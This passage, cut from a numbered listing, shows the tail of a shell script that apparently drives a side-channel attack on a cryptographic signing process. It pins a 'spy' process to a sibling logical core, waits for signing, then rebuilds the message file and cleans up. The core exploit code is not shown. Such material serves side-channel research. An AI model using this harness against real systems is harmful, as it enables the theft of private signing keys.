000084210000842100008421000084210000842100008421000084210000842100008421000084210000842100008421 & 43 | 44 | sleep 0.1 45 | 46 | # Spy: must be on same physical core, but different logical core 47 | # start spying and generate the message to be signed 48 | taskset -c 3 ./spy 49 | 50 | # wait to finish the signature/spying 51 | wait 52 | 53 | # reproduce the message file (all zeroes) 54 | dd if=/dev/zero of=data.bin bs=1 count=1K 55 | 56 | # remove pipe 57 | rm -f pipe.fifo 58 | 59 | pkill spy 60 | 61 | --------------------------------------------------------------------------------